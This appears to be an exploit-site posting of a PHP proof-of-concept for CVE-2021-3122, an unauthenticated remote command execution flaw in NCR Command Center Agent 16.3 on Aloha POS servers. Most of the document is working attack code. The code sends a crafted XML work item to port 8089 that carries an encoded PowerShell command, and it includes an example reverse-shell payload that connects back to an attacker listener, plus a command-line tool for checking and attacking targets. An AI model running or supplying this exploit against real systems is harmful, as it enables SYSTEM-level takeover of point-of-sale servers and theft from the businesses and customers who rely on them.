Share
## https://sploitus.com/exploit?id=PACKETSTORM:214926
=============================================================================================================================================
    | # Title     : NCR Command Center Agent 16.3 RCE Exploit                                                                                   |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://www.ncr.com/                                                                                                        |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/211034/ &	CVE-2021-3122
    
    [+] Summary    : This PHP implementation provides a tool for testing the CVE-2021-3122 vulnerability in NCR Command Center Agent version 16.3 on Aloha POS/BOH servers. 
                     The vulnerability allows remote, unauthenticated attackers to execute arbitrary commands with SYSTEM privileges by sending a specially crafted XML document to port 8089.
    				 
    [+] POC : php poc.php
    
    <?php
    
    class NCRCommandCenterExploit {
        private $rhost;
        private $rport;
        private $verbose;
        private $timeout = 30;
        
        public function __construct($rhost, $rport = 8089, $verbose = false) {
            $this->rhost = $rhost;
            $this->rport = $rport;
            $this->verbose = $verbose;
        }
        
        /**
         * التحقق من وجود الخدمة
         */
        public function check() {
            try {
                $socket = $this->connect();
                
                // محاولة قراءة البنر
                $banner = $this->readSocket($socket, 1024);
                $this->disconnect($socket);
                
                if (strpos($banner, '<cmcsys:myNodeNumber') !== false) {
                    return "Detected";
                }
                
                return "Safe";
                
            } catch (Exception $e) {
                return "Safe: " . $e->getMessage();
            }
        }
        
        /**
         * إنشاء حمولة XML
         */
        private function generateXml($cmdPayload) {
            $workitem_id = rand(1, 9);
            $source_node = rand(1, 9);
            
            $exec_statuses = ['Unknown', 'Waiting', 'InProgress'];
            $exec_status = $exec_statuses[array_rand($exec_statuses)];
            
            $dest_servers = ['WebServer', 'RdfServer'];
            $dest_server = $dest_servers[array_rand($dest_servers)];
            
            $guid = $this->generateGuid();
            
            $xml_body = '<workitemroot commandname="runCommand">';
            $xml_body .= '<WorkItem>';
            $xml_body .= '<WorkItemId>' . $workitem_id . '</WorkItemId>';
            $xml_body .= '<CommandName>runCommand</CommandName>';
            $xml_body .= '<SourceNode>' . $source_node . '</SourceNode>';
            $xml_body .= '<TargetNode>0</TargetNode>';
            $xml_body .= '<Status>' . $exec_status . '</Status>';
            $xml_body .= '</WorkItem>';
            $xml_body .= '<command>';
            $xml_body .= '<Arguments>' . $cmdPayload . '</Arguments>';
            $xml_body .= '<Guid>' . $guid . '</Guid>';
            $xml_body .= '<Result></Result>';
            $xml_body .= '<destserver>' . $dest_server . '</destserver>';
            $xml_body .= '</command>';
            $xml_body .= '</workitemroot>';
            $xml_body .= '<:EOM:>';
            
            return $xml_body;
        }
        
        /**
         * توليد GUID عشوائي
         */
        private function generateGuid() {
            if (function_exists('com_create_guid') === true) {
                return trim(com_create_guid(), '{}');
            }
            
            $data = random_bytes(16);
            $data[6] = chr(ord($data[6]) & 0x0f | 0x40); // version 4
            $data[8] = chr(ord($data[8]) & 0x3f | 0x80); // variant
            
            return vsprintf('%s%s-%s-%s-%s-%s%s%s', str_split(bin2hex($data), 4));
        }
        
        /**
         * إنشاء حمولة PowerShell
         */
        private function createPowerShellPayload($encodedPayload) {
            // حمولة PowerShell الأساسية
            $payload = "powershell -exec bypass -enc " . $encodedPayload;
            return $payload;
        }
        
        /**
         * تشغيل الاستغلال
         */
        public function exploit($payload) {
            try {
                $socket = $this->connect();
                
                if ($this->verbose) {
                    echo "[+] Connected to {$this->rhost}:{$this->rport}\n";
                }
                
                // ترميز الحمولة (يمكن استخدام base64 هنا)
                $encodedPayload = base64_encode($payload);
                $cmdPayload = $this->createPowerShellPayload($encodedPayload);
                
                // إنشاء XML
                $payloadXml = $this->generateXml($cmdPayload);
                
                if ($this->verbose) {
                    echo "[*] Generated payload XML\n";
                }
                
                // إرسال الحمولة
                $this->writeSocket($socket, $payloadXml);
                
                if ($this->verbose) {
                    echo "[*] Payload sent\n";
                    echo "[*] Check your listener\n";
                }
                
                // قراءة الاستجابة (اختياري)
                $response = $this->readSocket($socket, 4096);
                
                $this->disconnect($socket);
                
                return [
                    'success' => true,
                    'response' => $response
                ];
                
            } catch (Exception $e) {
                return [
                    'success' => false,
                    'error' => $e->getMessage()
                ];
            }
        }
        
        /**
         * الاتصال بالهدف
         */
        private function connect() {
            $socket = @fsockopen($this->rhost, $this->rport, $errno, $errstr, $this->timeout);
            
            if (!$socket) {
                throw new Exception("Failed to connect: {$errstr} ({$errno})");
            }
            
            // تعيين مهلة للقراءة/الكتابة
            stream_set_timeout($socket, $this->timeout);
            
            return $socket;
        }
        
        /**
         * كتابة البيانات إلى السوكيت
         */
        private function writeSocket($socket, $data) {
            $written = fwrite($socket, $data);
            
            if ($written === false) {
                throw new Exception("Failed to write to socket");
            }
            
            return $written;
        }
        
        /**
         * قراءة البيانات من السوكيت
         */
        private function readSocket($socket, $length) {
            $data = fread($socket, $length);
            
            if ($data === false) {
                throw new Exception("Failed to read from socket");
            }
            
            return $data;
        }
        
        /**
         * قطع الاتصال
         */
        private function disconnect($socket) {
            if (is_resource($socket)) {
                fclose($socket);
            }
        }
        
        /**
         * مثال على استخدام الكود
         */
        public static function exampleUsage() {
            $target = "192.168.1.100";
            $port = 8089;
            
            $exploit = new self($target, $port, true);
            
            echo "[*] Checking target...\n";
            $checkResult = $exploit->check();
            echo "[*] Check result: {$checkResult}\n";
            
            if ($checkResult === "Detected") {
                // حمولة PowerShell عكسية مثال
                // يمكنك تغييرها حسب احتياجاتك
                $reverseShellPayload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.1.50",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()';
                
                echo "[*] Executing exploit...\n";
                $result = $exploit->exploit($reverseShellPayload);
                
                if ($result['success']) {
                    echo "[+] Exploit executed successfully\n";
                    if (!empty($result['response'])) {
                        echo "[+] Response: " . htmlspecialchars($result['response']) . "\n";
                    }
                } else {
                    echo "[-] Exploit failed: " . $result['error'] . "\n";
                }
            } else {
                echo "[-] Target not vulnerable or service not detected\n";
            }
        }
    }
    
    // استخدام الكود من سطر الأوامر
    if (php_sapi_name() === 'cli') {
        $options = getopt("h:p:v::", ["help", "check", "exploit:"]);
        
        if (isset($options['h']) || isset($options['help'])) {
            echo "NCR Command Center Agent RCE Exploit (CVE-2021-3122)\n";
            echo "Usage:\n";
            echo "  -h <host>           Target host\n";
            echo "  -p <port>           Target port (default: 8089)\n";
            echo "  -v                  Verbose mode\n";
            echo "  --check             Check if target is vulnerable\n";
            echo "  --exploit <payload> Execute exploit with payload\n";
            echo "\nExample:\n";
            echo "  php " . basename(__FILE__) . " -h 192.168.1.100 --check\n";
            echo "  php " . basename(__FILE__) . " -h 192.168.1.100 -v --exploit 'whoami'\n";
            exit(0);
        }
        
        if (isset($options['h'])) {
            $host = $options['h'];
            $port = isset($options['p']) ? $options['p'] : 8089;
            $verbose = isset($options['v']);
            
            $exploit = new NCRCommandCenterExploit($host, $port, $verbose);
            
            if (isset($options['check'])) {
                $result = $exploit->check();
                echo "Target: " . $host . ":" . $port . "\n";
                echo "Status: " . $result . "\n";
            }
            
            if (isset($options['exploit'])) {
                $payload = $options['exploit'];
                $result = $exploit->exploit($payload);
                
                if ($result['success']) {
                    echo "Exploit executed successfully!\n";
                } else {
                    echo "Exploit failed: " . $result['error'] . "\n";
                }
            }
        } else {
            echo "Error: Target host is required. Use -h for help.\n";
        }
    }
    
    // لاختبار الكود مباشرة (إلغاء التعليق للاختبار)
    // NCRCommandCenterExploit::exampleUsage();
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================